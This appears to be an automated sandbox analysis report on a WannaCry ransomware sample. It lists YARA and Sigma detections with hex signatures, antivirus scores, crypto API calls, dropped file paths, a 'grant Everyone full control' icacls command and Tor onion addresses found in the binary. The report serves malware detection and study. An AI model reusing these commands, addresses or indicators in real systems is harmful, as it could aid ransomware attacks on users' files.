C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
Click to see the 36 entries

Memory Dumps

Source	Rule	Description	Author	Strings
000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000000.1123120496.000000000040E000.00000008.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000002.2384451558.000000000040F000.00000004.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: WannaCry_2.EXE PID: 7008	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.WannaCry_2.EXE.9e6968.0.unpack	WanaCry	WanaCry Payload	kevoreilly	0xd5c4:$exename: @WanaDecryptor@.exe 0xd60c:$exename: @WanaDecryptor@.exe 0xd8c0:$res: %08X.res 0xd8b4:$pky: %08X.pky 0xd8a8:$eky: %08X.eky 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
0.2.WannaCry_2.EXE.10000000.1.unpack	WanaCry	WanaCry Payload	kevoreilly	0xd5c4:$exename: @WanaDecryptor@.exe 0xd60c:$exename: @WanaDecryptor@.exe 0xd8c0:$res: %08X.res 0xd8b4:$pky: %08X.pky 0xd8a8:$eky: %08X.eky 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
202.0.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
202.0.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
0.2.WannaCry_2.EXE.9e6968.0.raw.unpack	WanaCry	WanaCry Payload	kevoreilly	0xd5c4:$exename: @WanaDecryptor@.exe 0xd60c:$exename: @WanaDecryptor@.exe 0xd8c0:$res: %08X.res 0xd8b4:$pky: %08X.pky 0xd8a8:$eky: %08X.eky 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
0.0.WannaCry_2.EXE.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.WannaCry_2.EXE.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.WannaCry_2.EXE.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.WannaCry_2.EXE.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\WannaCry_2.EXE, ProcessId: 7008, TargetFilename: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD91F6.tmp

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WannaCry_2.EXE", ParentImage: C:\Users\user\Desktop\WannaCry_2.EXE, ParentProcessId: 7008, ParentProcessName: WannaCry_2.EXE, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 6656, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript.exe //nologo m.vbs, CommandLine: cscript.exe //nologo m.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c 133611722583794.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6208, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo m.vbs, ProcessId: 4304, ProcessName: cscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WannaCry_2.EXE", ParentImage: C:\Users\user\Desktop\WannaCry_2.EXE, ParentProcessId: 7008, ParentProcessName: WannaCry_2.EXE, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 6656, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: WannaCry_2.EXE

Avira: detected

Antivirus detection for dropped file

Source: C:\@WanaDecryptor@.exe

Avira: detection malicious, Label: TR/FileCoder.724645

Multi AV Scanner detection for dropped file

Source: C:\@WanaDecryptor@.exe	ReversingLabs: Detection: 97%
Source: C:\@WanaDecryptor@.exe	Virustotal: Detection: 90%	Perma Link
Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	ReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	Virustotal: Detection: 90%	Perma Link
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	ReversingLabs: Detection: 97%
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Virustotal: Detection: 90%	Perma Link
Source: C:\Users\user\Desktop\taskdl.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\taskdl.exe	Virustotal: Detection: 87%	Perma Link
Source: C:\Users\user\Desktop\taskse.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\taskse.exe	Virustotal: Detection: 90%	Perma Link
Source: C:\Users\user\Desktop\u.wnry	ReversingLabs: Detection: 97%
Source: C:\Users\user\Desktop\u.wnry	Virustotal: Detection: 90%	Perma Link
Source: C:\Users\user\Documents\@WanaDecryptor@.exe	ReversingLabs: Detection: 97%
Source: C:\Users\user\Documents\@WanaDecryptor@.exe	Virustotal: Detection: 90%	Perma Link
Source: C:\Users\user\Downloads\@WanaDecryptor@.exe	ReversingLabs: Detection: 97%
Source: C:\Users\user\Downloads\@WanaDecryptor@.exe	Virustotal: Detection: 90%	Perma Link

Multi AV Scanner detection for submitted file

Source: WannaCry_2.EXE	ReversingLabs: Detection: 92%
Source: WannaCry_2.EXE	Virustotal: Detection: 94%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.5% probability

Machine Learning detection for dropped file

Source: C:\@WanaDecryptor@.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: WannaCry_2.EXE

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,	0_2_10003F00
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10003C00 CryptDestroyKey,	0_2_10003C00
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004040 CryptExportKey,GlobalAlloc,CryptExportKey,_local_unwind2,CreateFileA,WriteFile,_local_unwind2,	0_2_10004040
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004350 CryptGenKey,	0_2_10004350
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004170 CryptExportKey,CryptGetKeyParam,GlobalAlloc,CryptEncrypt,GlobalFree,	0_2_10004170
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004370 EnterCriticalSection,CryptEncrypt,LeaveCriticalSection,LeaveCriticalSection,	0_2_10004370
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10003A80 GetFileAttributesA,GetFileAttributesA,CryptAcquireContextA,	0_2_10003A80
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10003BB0 GetFileAttributesA,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	0_2_10003BB0
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,	0_2_10003AC0
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10003D10 GetFileAttributesA,CryptEncrypt,_local_unwind2,CryptDecrypt,GetFileAttributesA,strncmp,_local_unwind2,	0_2_10003D10
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004420 CryptGenRandom,	0_2_10004420
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	0_2_10004440

Source: WannaCry_2.EXE

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCacheBlocking_prod.pdb.VP9VideoExtensions_8wekyb source: WannaCry_2.EXE, 00000000.00000002.2398944134.000000000371E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2lication Data\Applicatio source: WannaCry_2.EXE, 00000000.00000003.1232871894.00000000025B3000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,??_U@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,		0_2_10002300
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,		0_2_10004A40

Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\GenuineTicket\~SD7337.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\~SDFE2E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\~SD7324.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\Apps\~SD7336.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\~SD7325.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\~SD7323.tmp	Jump to behavior

Networking

Found Tor onion address

Source: WannaCry_2.EXE, 00000000.00000002.2417050022.000000001000C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip!WD
Source: @WanaDecryptor@.exe, 000000CA.00000002.2383330775.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: C13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

Source: SIHClient.exe, 00000043.00000003.1653352890.00000212F3779000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.cP
